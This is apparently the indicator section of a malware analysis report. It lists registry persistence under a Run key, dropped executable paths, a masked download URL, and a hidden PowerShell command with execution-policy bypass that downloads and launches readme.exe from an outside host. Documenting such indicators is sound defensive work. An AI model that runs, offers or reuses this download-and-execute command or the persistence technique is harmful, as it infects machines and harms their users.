Technical information
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Suhu' = '%APPDATA%\Uflin\keryov.exe'
- http://de##.###94jd93js93js.com/readme.exe as %appdata%\readme.exe
- %WINDIR%\syswow64\msiexec.exe
- %TEMP%\abctfhghghghghВЈ.sct
- %APPDATA%\readme.exe
- %APPDATA%\uflin\keryov.exe
- http://de##.###94jd93js93js.com/readme.exe
- '%APPDATA%\readme.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://de##.###94jd93js93js.com/readme.exe','%APPDATA%\readme.exe');Start-Pro...' (with hidden window)
- '%WINDIR%\syswow64\msiexec.exe'